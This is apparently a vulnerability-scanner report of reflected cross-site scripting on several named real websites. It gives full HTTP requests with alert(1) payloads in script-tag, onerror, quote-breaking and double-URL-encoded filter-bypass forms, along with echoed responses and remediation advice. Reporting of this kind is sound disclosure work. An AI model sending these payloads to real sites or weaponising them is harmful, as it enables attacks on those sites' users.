GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695a8c53<script>alert(1)</script>8191e201fe7 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 7b022<script>alert(1)</script>b58af19e21a was submitted in the method parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1.0/endpoint?method=story.getAll7b022<script>alert(1)</script>b58af19e21a&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
gig_pc_digg_1314893420413_13236868544481695({ "status": 403, "timestamp": 1314893560, "message": "No such method 'story.getAll7b022<script>alert(1)</script>b58af19e21a' on version 1.0", "code": 1052 });
1.313. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://services.digg.com
Path: /1.0/endpoint
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f5a2<script>alert(1)</script>1f52765a28f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695&7f5a2<script>alert(1)</script>1f52765a28f=1 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 43c47<script>alert(1)</script>e22ca6b0f41 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript43c47<script>alert(1)</script>e22ca6b0f41&callback=gig_pc_digg_1314893420413_13236868544481695 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc95e%3balert(1)//877d56ad18e was submitted in the cb parameter. This input was echoed as dc95e;alert(1)//877d56ad18e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e20d7<script>alert(1)</script>36250b8f91c was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /widgets/nearyou/search?api_key=45ts42zbd3tjfp25g722juwz&s=date_asc&f=activities&v=json&m=meta%3AstartDate%3Adaterange%3Atoday..&l=&num=3&cb=OX.AJAST.__callbacks__.callback1e20d7<script>alert(1)</script>36250b8f91c HTTP/1.1
Host: widgets.active.com
Proxy-Connection: keep-alive
Referer: http://www.activenetwork.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 4ea29<script>alert(1)</script>30dae4c7855 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/mvtimescom/blind-sql-injection-xss-cwe79-capec66-poc.html4ea29<script>alert(1)</script>30dae4c7855 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 10500%253cscript%253ealert%25281%2529%253c%252fscript%253ec09c9ece34b was submitted in the REST URL parameter 3. This input was echoed as 10500<script>alert(1)</script>c09c9ece34b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/2011060600639010500%253cscript%253ealert%25281%2529%253c%252fscript%253ec09c9ece34b/en/eBay-Agrees-Acquire-Magento HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.businesswire.com
Response
HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:41:29 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21474
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 2011060600639010500<script>alert(1)</script>c09c9ece34b and language = en.</span> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 11e6f%253cscript%253ealert%25281%2529%253c%252fscript%253e7f5cefa0606 was submitted in the REST URL parameter 4. This input was echoed as 11e6f<script>alert(1)</script>7f5cefa0606 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/20110606006390/en11e6f%253cscript%253ealert%25281%2529%253c%252fscript%253e7f5cefa0606/eBay-Agrees-Acquire-Magento HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.businesswire.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 20110606006390 and language = en11e6f<script>alert(1)</script>7f5cefa0606.</span> ...[SNIP]...
The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 35e0e%3balert(1)//b81aa6338aede4970 was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as 35e0e;alert(1)//b81aa6338aede4970 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eed86"%3balert(1)//bce1ca0334318ecc was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as eed86";alert(1)//bce1ca0334318ecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cc7b4%3balert(1)//9dcf24fbbae29fe73 was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as cc7b4;alert(1)//9dcf24fbbae29fe73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d4866%3balert(1)//7adf7fe3a9ec7b8e was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as d4866;alert(1)//7adf7fe3a9ec7b8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b513a%3balert(1)//55e54f10d448fe345 was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as b513a;alert(1)//55e54f10d448fe345 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d989"%3balert(1)//ffb3e0bcf8c8e65a5 was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as 1d989";alert(1)//ffb3e0bcf8c8e65a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 65693%3balert(1)//fa7cf0ceb078b98f0 was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as 65693;alert(1)//fa7cf0ceb078b98f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dcd60%3balert(1)//0b96acd41133d8c9a was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as dcd60;alert(1)//0b96acd41133d8c9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a417%3balert(1)//9327e05363b was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as 9a417;alert(1)//9327e05363b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f314"%3balert(1)//5a389706e86 was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as 8f314";alert(1)//5a389706e86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5dea%3balert(1)//19c929529ef was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as f5dea;alert(1)//19c929529ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5ba8d%3balert(1)//2437f3f8a0d was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as 5ba8d;alert(1)//2437f3f8a0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the event request parameter is copied into the HTML document as plain text between tags. The payload cbbc9<script>alert(1)</script>9c8029bf821 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 31 Aug 2011 21:17:35 GMT
Content-Length: 45745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http: ...[SNIP]...
<b>Sorry the page (homecbbc9<script>alert(1)</script>9c8029bf821) you are trying to reach is temporarily unavailable or the page no longer exists.</b> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96123<img%20src%3da%20onerror%3dalert(1)>4d326f7959d was submitted in the REST URL parameter 1. This input was echoed as 96123<img src=a onerror=alert(1)>4d326f7959d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /favicon.ico96123<img%20src%3da%20onerror%3dalert(1)>4d326f7959d HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.northeastassembly.org
Proxy-Connection: Keep-Alive
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d545c<img%20src%3da%20onerror%3dalert(1)>a17ba1d1400 was submitted in the REST URL parameter 1. This input was echoed as d545c<img src=a onerror=alert(1)>a17ba1d1400 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48c90<img%20src%3da%20onerror%3dalert(1)>8fb9e79cd91 was submitted in the REST URL parameter 2. This input was echoed as 48c90<img src=a onerror=alert(1)>8fb9e79cd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8aa59<script>alert(1)</script>591ff6210ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42bea<script>alert(1)</script>49517bc6b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7173f'%3balert(1)//3a5e4e79bff was submitted in the REST URL parameter 1. This input was echoed as 7173f';alert(1)//3a5e4e79bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b563'%3balert(1)//6baa6ca43a7 was submitted in the REST URL parameter 2. This input was echoed as 8b563';alert(1)//6baa6ca43a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45ad9'%3balert(1)//dca9cdb09d8 was submitted in the REST URL parameter 3. This input was echoed as 45ad9';alert(1)//dca9cdb09d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e52f7'%3balert(1)//c6fe33d9af8 was submitted in the REST URL parameter 4. This input was echoed as e52f7';alert(1)//c6fe33d9af8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5700b'%3balert(1)//a4618d0f33e was submitted in the REST URL parameter 1. This input was echoed as 5700b';alert(1)//a4618d0f33e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6e7b'%3balert(1)//3e61a40bc15 was submitted in the REST URL parameter 2. This input was echoed as c6e7b';alert(1)//3e61a40bc15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f104'%3balert(1)//a91ae3923d0 was submitted in the REST URL parameter 3. This input was echoed as 3f104';alert(1)//a91ae3923d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcd32'%3balert(1)//2ebec79faf0 was submitted in the REST URL parameter 4. This input was echoed as bcd32';alert(1)//2ebec79faf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb973'%3balert(1)//5ae776482d2 was submitted in the REST URL parameter 1. This input was echoed as cb973';alert(1)//5ae776482d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5e28'%3balert(1)//72640ad8ae9 was submitted in the REST URL parameter 1. This input was echoed as c5e28';alert(1)//72640ad8ae9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433e7'%3balert(1)//a6ca7c8d8b3 was submitted in the REST URL parameter 2. This input was echoed as 433e7';alert(1)//a6ca7c8d8b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e41'%3balert(1)//2868a32650b was submitted in the REST URL parameter 1. This input was echoed as a7e41';alert(1)//2868a32650b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c808'%3balert(1)//cc626548f60 was submitted in the REST URL parameter 2. This input was echoed as 2c808';alert(1)//cc626548f60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e722e'%3balert(1)//9a384f26ad1 was submitted in the REST URL parameter 3. This input was echoed as e722e';alert(1)//9a384f26ad1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1bb'%3balert(1)//d95411b89d1 was submitted in the REST URL parameter 4. This input was echoed as cf1bb';alert(1)//d95411b89d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab767'%3balert(1)//079ca41f4fb was submitted in the REST URL parameter 5. This input was echoed as ab767';alert(1)//079ca41f4fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38297'%3balert(1)//65f5d667c36 was submitted in the REST URL parameter 6. This input was echoed as 38297';alert(1)//65f5d667c36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e1c3'%3balert(1)//e4208c355d3db111b was submitted in the REST URL parameter 1. This input was echoed as 1e1c3';alert(1)//e4208c355d3db111b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65da6'-alert(1)-'f485ca4e6a8f11a8d was submitted in the batchId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Vile defense against sex harassment lawsuit: She's too u ...[SNIP]... re Are They Now?";s9.url="http://www.nydailynews.com/entertainment/movies/galleries/beverly_hills_cop_where_are_they_now/beverly_hills_cop_where_are_they_now.html"; dwr.engine._remoteHandleCallback('065da6'-alert(1)-'f485ca4e6a8f11a8d','0',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2701'-alert(1)-'51301dabb52a6555 was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Vile defense against sex harassment lawsuit: She's too u ...[SNIP]... re They Now?";s9.url="http://www.nydailynews.com/entertainment/movies/galleries/beverly_hills_cop_where_are_they_now/beverly_hills_cop_where_are_they_now.html"; dwr.engine._remoteHandleCallback('0','0f2701'-alert(1)-'51301dabb52a6555',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-methodName request parameter is copied into the HTML document as plain text between tags. The payload 82732<script>alert(1)</script>c32ba96e3f17ced29 was submitted in the c0-methodName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload c04a1<script>alert(1)</script>01f351e2c7684ef21 was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc04a1<script>alert(1)</script>01f351e2c7684ef21' }, '0'); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc04a1<script> ...[SNIP]...
